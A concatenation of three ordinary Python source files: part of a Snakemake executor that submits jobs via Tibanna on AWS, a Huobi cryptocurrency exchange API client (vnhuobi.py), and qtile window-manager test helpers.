max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.main_snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
exec_job = (
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait 0 --scheduler {workflow.scheduler_type} "
"--attempt 1 {use_threads} --max-inventory-time 0 "
"{overwrite_config} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_get_default_resources_args=True,
)
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Tibanna jobs.")
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
def remove_prefix(self, s):
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
def handle_remote(self, target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
def add_command(self, job, tibanna_args, tibanna_config):
# snakefile, with file name remapped
snakefile_fname = tibanna_args.snakemake_main_filename
# targets, with file name remapped
targets = job.get_targets()
if not isinstance(targets, list):
targets = [targets]
targets_default = " ".join([self.handle_remote(t) for t in targets])
# use_threads
use_threads = "--force-use-threads" if not job.is_group() else ""
# format command
command = self.format_job_pattern(
self.exec_job,
job,
target=targets_default,
snakefile=snakefile_fname,
use_threads=use_threads,
cores=tibanna_config["cpu"],
)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
# input & output
# Local snakemake command here must be run with --default-remote-prefix
# and --default-remote-provider (forced) but on VM these options will be removed.
# The snakemake on the VM will consider these input and output as not remote.
# They files are transferred to the container by Tibanna before running snakemake.
# In short, the paths on VM must be consistent with what's in Snakefile.
# but the actual location of the files is on the S3 bucket/prefix.
# This mapping info must be passed to Tibanna.
for i in job.input:
logger.debug("job input " + str(i))
logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
open_browser=False,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
# This is only needed if your backend does not allow to use callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- a list of input files
output -- a list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- a list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
# Determine whether to benchmark this process or do not
# benchmarking at all. We benchmark this process unless the
# execution is done through the ``shell:``, ``script:``, or
# ``wrapper:`` stanza.
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt in order to record an error in the
# scheduler but ignore it
raise e
except (Exception, BaseException) as ex:
# this ensures that exception can be re-raised in the parent thread
origin = get_exception_origin(ex, linemaps)
if origin is not None:
log_verbose_traceback(ex)
lineno, file = origin
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
else:
# some internal bug, just reraise
raise ex
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
|
vnhuobi.py
|
# encoding: utf-8
import sys
import json
import zlib
import urllib
import urllib.parse
import hmac
import base64
import hashlib
import requests
import traceback
from copy import copy
from datetime import datetime
from threading import Thread
from queue import Queue, Empty
from multiprocessing.dummy import Pool
from time import sleep
from websocket import create_connection, _exceptions
# 常量定义
TIMEOUT = 5
HUOBI_API_HOST = "api.huobi.pro"
HADAX_API_HOST = "api.hadax.com"
LANG = 'zh-CN'
DEFAULT_GET_HEADERS = {
"Content-type": "application/x-www-form-urlencoded",
'Accept': 'application/json',
'Accept-Language': LANG,
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'
}
DEFAULT_POST_HEADERS = {
'Content-Type': 'application/json',
'Accept': 'application/json',
'Accept-Language': LANG,
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'
}
#----------------------------------------------------------------------
def createSign(params, method, host, path, secretKey):
"""创建签名"""
sortedParams = sorted(params.items(), key=lambda d: d[0], reverse=False)
encodeParams = urllib.parse.urlencode(sortedParams)
payload = [method, host, path, encodeParams]
payload = '\n'.join(payload)
payload = payload.encode(encoding='UTF8')
secretKey = secretKey.encode(encoding='UTF8')
digest = hmac.new(secretKey, payload, digestmod=hashlib.sha256).digest()
signature = base64.b64encode(digest)
signature = signature.decode()
return signature
########################################################################
class TradeApi(object):
"""交易API"""
HUOBI = 'huobi'
HADAX = 'hadax'
SYNC_MODE = 'sync'
ASYNC_MODE = 'async'
# ----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.accessKey = ''
self.secretKey = ''
self.mode = self.ASYNC_MODE
self.active = False # API工作状态
self.reqid = 0 # 请求编号
self.queue = Queue() # 请求队列
self.pool = None # 线程池
self.DEBUG = False
# ----------------------------------------------------------------------
def init(self, host, accessKey, secretKey, mode=None):
"""初始化"""
if host == self.HUOBI:
self.hostname = HUOBI_API_HOST
else:
self.hostname = HADAX_API_HOST
self.hosturl = 'https://%s' %self.hostname
self.accessKey = accessKey
self.secretKey = secretKey
if mode:
self.mode = mode
self.proxies = {}
return True
# ----------------------------------------------------------------------
def start(self, n=10):
"""启动"""
self.active = True
# 异步模式
if self.mode == self.ASYNC_MODE:
self.pool = Pool(n)
self.pool.map_async(self.run, range(n))
# ----------------------------------------------------------------------
def close(self):
"""停止"""
self.active = False
self.pool.close()
self.pool.join()
# ----------------------------------------------------------------------
def httpGet(self, url, params):
"""HTTP GET"""
headers = copy(DEFAULT_GET_HEADERS)
postdata = urllib.parse.urlencode(params)
if self.DEBUG:
print('httpGet:{} {}'.format(url, params))
try:
response = requests.get(url, postdata, headers=headers, timeout=TIMEOUT)
if response.status_code == 200:
return True, response.json()
else:
return False, u'GET请求失败,状态代码:%s' %response.status_code
except Exception as e:
return False, u'GET请求触发异常,原因:%s' %e
# ----------------------------------------------------------------------
def httpPost(self, url, params, add_to_headers=None):
"""HTTP POST"""
headers = copy(DEFAULT_POST_HEADERS)
postdata = json.dumps(params)
try:
response = requests.post(url, postdata, headers=headers, timeout=TIMEOUT)
if response.status_code == 200:
return True, response.json()
else:
return False, u'POST请求失败,返回信息:%s' %response.json()
except Exception as e:
return False, u'POST请求触发异常,原因:%s' %e
# ----------------------------------------------------------------------
def generateSignParams(self):
"""生成签名参数"""
timestamp = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')
d = {
'AccessKeyId': self.accessKey,
'SignatureMethod': 'HmacSHA256',
'SignatureVersion': '2',
'Timestamp': timestamp
}
return d
# ----------------------------------------------------------------------
def apiGet(self, path, params):
"""API GET"""
method = 'GET'
params.update(self.generateSignParams())
params['Signature'] = createSign(params, method, self.hostname, path, self.secretKey)
url = self.hosturl + path
return self.httpGet(url, params)
# ----------------------------------------------------------------------
def apiPost(self, path, params):
"""API POST"""
method = 'POST'
signParams = self.generateSignParams()
signParams['Signature'] = createSign(signParams, method, self.hostname, path, self.secretKey)
url = self.hosturl + path + '?' + urllib.parse.urlencode(signParams)
if self.DEBUG:
print('api Get:{} {}'.format(url, params))
return self.httpPost(url, params)
# ----------------------------------------------------------------------
def addReq(self, path, params, func, callback):
"""添加请求"""
# 异步模式
if self.mode == self.ASYNC_MODE:
self.reqid += 1
req = (path, params, func, callback, self.reqid)
self.queue.put(req)
return self.reqid
# 同步模式
else:
return func(path, params)
# ----------------------------------------------------------------------
def processReq(self, req):
"""处理请求"""
path, params, func, callback, reqid = req
result, data = func(path, params)
if result:
if data['status'] == 'ok':
callback(data['data'], reqid)
else:
msg = u'错误代码:%s,错误信息:%s' %(data['err-code'], data['err-msg'])
self.onError(msg, reqid)
else:
self.onError(data, reqid)
# 失败的请求重新放回队列,等待下次处理
self.queue.put(req)
# ----------------------------------------------------------------------
def run(self, n):
"""连续运行"""
while self.active:
try:
req = self.queue.get(timeout=1)
self.processReq(req)
except Empty:
pass
#----------------------------------------------------------------------
def getSymbols(self):
"""查询合约代码"""
if self.hostname == HUOBI_API_HOST:
path = '/v1/common/symbols'
else:
path = '/v1/hadax/common/symbols'
params = {}
func = self.apiGet
callback = self.onGetSymbols
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def getCurrencys(self):
"""查询支持货币"""
if self.hostname == HUOBI_API_HOST:
path = '/v1/common/currencys'
else:
path = '/v1/hadax/common/currencys'
params = {}
func = self.apiGet
callback = self.onGetCurrencys
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def getTimestamp(self):
"""查询系统时间"""
path = '/v1/common/timestamp'
params = {}
func = self.apiGet
callback = self.onGetTimestamp
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def getAccounts(self):
"""查询账户"""
path = '/v1/account/accounts'
params = {}
func = self.apiGet
callback = self.onGetAccounts
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def getAccountBalance(self, accountid):
"""查询余额"""
if self.hostname == HUOBI_API_HOST:
path = '/v1/account/accounts/%s/balance' %accountid
else:
path = '/v1/hadax/account/accounts/%s/balance' %accountid
params = {}
func = self.apiGet
callback = self.onGetAccountBalance
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def getOrders(self, symbol, states, types=None, startDate=None,
endDate=None, from_=None, direct=None, size=None):
"""查询委托"""
path = '/v1/order/orders'
params = {
'symbol': symbol,
'states': states
}
if types:
params['types'] = types
if startDate:
params['start-date'] = startDate
if endDate:
params['end-date'] = endDate
if from_:
params['from'] = from_
if direct:
params['direct'] = direct
if size:
params['size'] = size
func = self.apiGet
callback = self.onGetOrders
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def getMatchResults(self, symbol, types=None, startDate=None,
endDate=None, from_=None, direct=None, size=None):
"""查询委托"""
path = '/v1/order/matchresults'
params = {
'symbol': symbol
}
if types:
params['types'] = types
if startDate:
params['start-date'] = startDate
if endDate:
params['end-date'] = endDate
if from_:
params['from'] = from_
if direct:
params['direct'] = direct
if size:
params['size'] = size
func = self.apiGet
callback = self.onGetMatchResults
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def getOrder(self, orderid):
"""查询某一委托"""
path = '/v1/order/orders/%s' %orderid
params = {}
func = self.apiGet
callback = self.onGetOrder
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def getMatchResult(self, orderid):
"""查询某一委托"""
path = '/v1/order/orders/%s/matchresults' %orderid
params = {}
func = self.apiGet
callback = self.onGetMatchResult
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def placeOrder(self, accountid, amount, symbol, type_, price=None, source=None):
"""下单"""
if self.hostname == HUOBI_API_HOST:
path = '/v1/order/orders/place'
else:
path = '/v1/hadax/order/orders/place'
params = {
'account-id': accountid,
'amount': amount,
'symbol': symbol,
'type': type_
}
if price:
params['price'] = price
if source:
params['source'] = source
func = self.apiPost
callback = self.onPlaceOrder
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def cancelOrder(self, orderid):
"""撤单"""
path = '/v1/order/orders/%s/submitcancel' %orderid
params = {}
func = self.apiPost
callback = self.onCancelOrder
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def batchCancel(self, orderids):
"""批量撤单"""
path = '/v1/order/orders/batchcancel'
params = {
'order-ids': orderids
}
func = self.apiPost
callback = self.onBatchCancel
return self.addReq(path, params, func, callback)
#----------------------------------------------------------------------
def onError(self, msg, reqid):
"""错误回调"""
print('onError:{},{}'.format(msg, reqid),file=sys.stderr)
#----------------------------------------------------------------------
def onGetSymbols(self, data, reqid):
"""查询代码回调"""
#print reqid, data
for d in data:
print(d)
#----------------------------------------------------------------------
def onGetCurrencys(self, data, reqid):
"""查询货币回调"""
print(reqid, data)
#----------------------------------------------------------------------
def onGetTimestamp(self, data, reqid):
"""查询时间回调"""
print(reqid, data)
#----------------------------------------------------------------------
def onGetAccounts(self, data, reqid):
"""查询账户回调"""
print(reqid, data)
#----------------------------------------------------------------------
def onGetAccountBalance(self, data, reqid):
"""查询余额回调"""
print (reqid, data)
for d in data['data']['list']:
print (d)
#----------------------------------------------------------------------
def onGetOrders(self, data, reqid):
"""查询委托回调"""
print (reqid, data)
#----------------------------------------------------------------------
def onGetMatchResults(self, data, reqid):
"""查询成交回调"""
print (reqid, data)
#----------------------------------------------------------------------
def onGetOrder(self, data, reqid):
"""查询单一委托回调"""
print (reqid, data)
#----------------------------------------------------------------------
def onGetMatchResult(self, data, reqid):
"""查询单一成交回调"""
print (reqid, data)
#----------------------------------------------------------------------
def onPlaceOrder(self, data, reqid):
"""委托回调"""
print (reqid, data)
#----------------------------------------------------------------------
def onCancelOrder(self, data, reqid):
"""撤单回调"""
print(reqid, data)
#----------------------------------------------------------------------
def onBatchCancel(self, data, reqid):
"""批量撤单回调"""
print (reqid, data)
########################################################################
class DataApi(object):
"""行情接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.ws = None
self.url = ''
self.reqid = 0
self.active = False
self.thread = None # Thread(target=self.run)
self.subDict = {}
self.url = ''
self.proxyHost = ''
self.proxyPort = 0
self.DEBUG = False
#----------------------------------------------------------------------
def run(self):
"""执行连接"""
while self.active:
try:
stream = self.ws.recv()
result = zlib.decompress(stream, 47).decode('utf-8')
data = json.loads(result)
self.onData(data)
except zlib.error:
self.onError(u'数据解压出错:%s' %stream)
except:
self.onError('行情服务器连接断开')
result = self.reconnect()
if not result:
self.onError(u'等待3秒后再次重连')
sleep(3)
else:
self.onError(u'行情服务器重连成功')
self.resubscribe()
#----------------------------------------------------------------------
def reconnect(self):
"""重连"""
try:
if self.DEBUG:
print('DataApi:reconnect:{}'.format(self.url))
if not self.proxyHost:
self.ws = create_connection(self.url)
else:
self.ws = create_connection(self.url,
http_proxy_host=self.proxyHost,
http_proxy_port=self.proxyPort)
return True
except:
msg = traceback.format_exc()
self.onError(u'行情服务器重连失败:%s' %msg)
return False
#----------------------------------------------------------------------
def resubscribe(self):
"""重新订阅"""
d = self.subDict
self.subDict = {}
for topic in d.keys():
self.subTopic(topic)
#----------------------------------------------------------------------
def connect(self, url, proxyHost='', proxyPort=0):
"""连接"""
self.url = url
self.proxyHost = proxyHost
self.proxyPort = proxyPort
try:
if not self.proxyHost:
self.ws = create_connection(self.url)
else:
self.ws = create_connection(self.url,
http_proxy_host=self.proxyHost,
http_proxy_port=self.proxyPort)
self.active = True
if self.thread is None:
self.thread = Thread(target=self.run)
self.thread.start()
return True
except:
msg = traceback.format_exc()
self.onError(u'行情服务器连接失败:%s' %msg)
return False
#----------------------------------------------------------------------
def close(self):
"""停止"""
if self.active:
self.active = False
if self.thread is not None:
self.thread.join()
self.ws.close()
#----------------------------------------------------------------------
def sendReq(self, req):
"""发送请求"""
stream = json.dumps(req)
if self.DEBUG:
print('DataApi.sendReq:{}'.format(stream))
self.ws.send(stream)
#----------------------------------------------------------------------
def pong(self, data):
"""响应心跳"""
req = {'pong': data['ping']}
self.sendReq(req)
#----------------------------------------------------------------------
def subTopic(self, topic):
"""订阅主题"""
if topic in self.subDict:
return
self.reqid += 1
req = {
'sub': topic,
'id': str(self.reqid)
}
self.sendReq(req)
self.subDict[topic] = str(self.reqid)
#----------------------------------------------------------------------
def unsubTopic(self, topic):
"""取消订阅主题"""
if topic not in self.subDict:
return
req = {
'unsub': topic,
'id': self.subDict[topic]
}
self.sendReq(req)
del self.subDict[topic]
#----------------------------------------------------------------------
def subscribeMarketDepth(self, symbol):
"""订阅行情深度"""
topic = 'market.%s.depth.step0' %symbol
self.subTopic(topic)
#----------------------------------------------------------------------
def subscribeTradeDetail(self, symbol):
"""订阅成交细节"""
topic = 'market.%s.trade.detail' %symbol
self.subTopic(topic)
#----------------------------------------------------------------------
def subscribeMarketDetail(self, symbol):
"""订阅市场细节"""
topic = 'market.%s.detail' %symbol
self.subTopic(topic)
#----------------------------------------------------------------------
def onError(self, msg):
"""错误推送"""
print('onError:{}'.format(msg))
#----------------------------------------------------------------------
def onData(self, data):
"""数据推送"""
if 'ping' in data:
self.pong(data)
elif 'ch' in data:
if 'depth.step' in data['ch']:
self.onMarketDepth(data)
elif 'trade.detail' in data['ch']:
self.onTradeDetail(data)
elif 'detail' in data['ch']:
self.onMarketDetail(data)
elif 'err-code' in data:
self.onError(u'onData错误代码:%s, 信息:%s' %(data['err-code'], data['err-msg']))
#----------------------------------------------------------------------
def onMarketDepth(self, data):
"""行情深度推送 """
print('onMarketDepth:{}'.format(data))
#----------------------------------------------------------------------
def onTradeDetail(self, data):
"""成交细节推送"""
print('onTradeDetail:{}'.format(data))
#----------------------------------------------------------------------
def onMarketDetail(self, data):
"""市场细节推送"""
print('onMarketDetail:{}'.format(data))
|
helpers.py
|
"""
This file contains various helpers and basic variables for the test suite.
Defining them here rather than in conftest.py avoids issues with circular imports
between test/conftest.py and test/backend/<backend>/conftest.py files.
"""
import functools
import logging
import multiprocessing
import os
import subprocess
import sys
import tempfile
import time
import traceback
from abc import ABCMeta, abstractmethod
from pathlib import Path
from libqtile import command, config, ipc, layout
from libqtile.confreader import Config
from libqtile.core.manager import Qtile
from libqtile.lazy import lazy
from libqtile.log_utils import init_log
from libqtile.resources import default_config
# the sizes for outputs
WIDTH = 800
HEIGHT = 600
SECOND_WIDTH = 640
SECOND_HEIGHT = 480
max_sleep = 5.0
sleep_time = 0.1
class Retry:
def __init__(
self,
fail_msg="retry failed!",
ignore_exceptions=(),
dt=sleep_time,
tmax=max_sleep,
return_on_fail=False,
):
self.fail_msg = fail_msg
self.ignore_exceptions = ignore_exceptions
self.dt = dt
self.tmax = tmax
self.return_on_fail = return_on_fail
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
tmax = time.time() + self.tmax
dt = self.dt
ignore_exceptions = self.ignore_exceptions
while time.time() <= tmax:
try:
return fn(*args, **kwargs)
except ignore_exceptions:
pass
except AssertionError:
break
time.sleep(dt)
dt *= 1.5
if self.return_on_fail:
return False
else:
raise AssertionError(self.fail_msg)
return wrapper
class BareConfig(Config):
auto_fullscreen = True
groups = [config.Group("a"), config.Group("b"), config.Group("c"), config.Group("d")]
layouts = [layout.stack.Stack(num_stacks=1), layout.stack.Stack(num_stacks=2)]
floating_layout = default_config.floating_layout
keys = [
config.Key(
["control"],
"k",
lazy.layout.up(),
),
config.Key(
["control"],
"j",
lazy.layout.down(),
),
]
mouse = []
screens = [config.Screen()]
follow_mouse_focus = False
reconfigure_screens = False
class Backend(metaclass=ABCMeta):
"""A base class to help set up backends passed to TestManager"""
def __init__(self, env, args=()):
self.env = env
self.args = args
def create(self):
"""This is used to instantiate the Core"""
return self.core(*self.args)
def configure(self, manager):
"""This is used to do any post-startup configuration with the manager"""
pass
@abstractmethod
def fake_click(self, x, y):
"""Click at the specified coordinates"""
pass
@abstractmethod
def get_all_windows(self):
"""Get a list of all windows in ascending order of Z position"""
pass
@Retry(ignore_exceptions=(ipc.IPCError,), return_on_fail=True)
def can_connect_qtile(socket_path, *, ok=None):
if ok is not None and not ok():
raise AssertionError()
ipc_client = ipc.Client(socket_path)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
client = command.client.InteractiveCommandClient(ipc_command)
val = client.status()
if val == "OK":
return True
return False
class TestManager:
"""Spawn a Qtile instance
Setup a Qtile server instance on the given display, with the given socket
and log files. The Qtile server must be started, and then stopped when it
is done. Windows can be spawned for the Qtile instance to interact with
with various `.test_*` methods.
"""
def __init__(self, backend, debug_log):
self.backend = backend
self.log_level = logging.DEBUG if debug_log else logging.INFO
self.backend.manager = self
self.proc = None
self.c = None
self.testwindows = []
def __enter__(self):
"""Set up resources"""
self._sockfile = tempfile.NamedTemporaryFile()
self.sockfile = self._sockfile.name
return self
def __exit__(self, _exc_type, _exc_value, _exc_tb):
"""Clean up resources"""
self.terminate()
self._sockfile.close()
def start(self, config_class, no_spawn=False, state=None):
rpipe, wpipe = multiprocessing.Pipe()
def run_qtile():
try:
os.environ.pop("DISPLAY", None)
os.environ.pop("WAYLAND_DISPLAY", None)
kore = self.backend.create()
os.environ.update(self.backend.env)
init_log(self.log_level, log_path=None, log_color=False)
Qtile(
kore,
config_class(),
socket_path=self.sockfile,
no_spawn=no_spawn,
state=state,
).loop()
except Exception:
wpipe.send(traceback.format_exc())
self.proc = multiprocessing.Process(target=run_qtile)
self.proc.start()
# First, wait for socket to appear
if can_connect_qtile(self.sockfile, ok=lambda: not rpipe.poll()):
ipc_client = ipc.Client(self.sockfile)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
self.c = command.client.InteractiveCommandClient(ipc_command)
self.backend.configure(self)
return
if rpipe.poll(0.1):
error = rpipe.recv()
raise AssertionError("Error launching qtile, traceback:\n%s" % error)
raise AssertionError("Error launching qtile")
def create_manager(self, config_class):
"""Create a Qtile manager instance in this thread
This should only be used when it is known that the manager will throw
an error and the returned manager should not be started, otherwise this
will likely block the thread.
"""
init_log(self.log_level, log_path=None, log_color=False)
kore = self.backend.create()
config = config_class()
for attr in dir(default_config):
if not hasattr(config, attr):
setattr(config, attr, getattr(default_config, attr))
return Qtile(kore, config, socket_path=self.sockfile)
def terminate(self):
if self.proc is None:
print("qtile is not alive", file=sys.stderr)
else:
# try to send SIGTERM and wait up to 10 sec to quit
self.proc.terminate()
self.proc.join(10)
if self.proc.is_alive():
print("Killing qtile forcefully", file=sys.stderr)
# desperate times... this probably messes with multiprocessing...
try:
os.kill(self.proc.pid, 9)
self.proc.join()
except OSError:
# The process may have died due to some other error
pass
if self.proc.exitcode:
print("qtile exited with exitcode: %d" % self.proc.exitcode, file=sys.stderr)
